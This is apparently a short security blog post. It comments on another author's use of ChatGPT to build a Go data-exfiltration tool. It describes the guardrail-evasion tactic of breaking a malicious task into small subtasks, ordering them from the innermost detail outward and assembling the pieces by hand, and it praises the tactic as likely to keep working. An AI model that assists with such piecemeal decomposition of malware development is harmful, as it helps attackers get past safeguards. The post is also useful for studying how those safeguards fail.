Slip Through OpenAI Guardrails by Breaking up Tasks

Evading AI Guardrails: Crafting Malware with ChatGPT's Assistance

In a poorly titled blog post (“I built a Zero Day with undetectable exfiltration using only ChatGPT prompts”), the author describes how he created bog standard exfiltration tool in the Go programming language using ChatGPT (this is not a Zero Day where I come from…).

The overall purpose of this exercise was to prove two things: 1. How easy it is to evade the insufficient guardrails that ChatGPT has in place 2. How easy it is to create advanced malware without writing any code and only using ChatGPT

Hype aside, the observation worth noting is the bottom-up tasking tactic the author employed with ChatGPT. AI safety controls struggle to discern meaning if you break your task into a set of smaller tasks, sequence them from the innermost detail to the outermost and assemble the pieces yourself. It’s not a new tactic by any means - think early days TCP/IP Network Intrusion Detection Evasion. Or if a James Bond fan, “Man with the Golden Gun”. But it’s a keeper since I don’t see this getting solved anytime soon.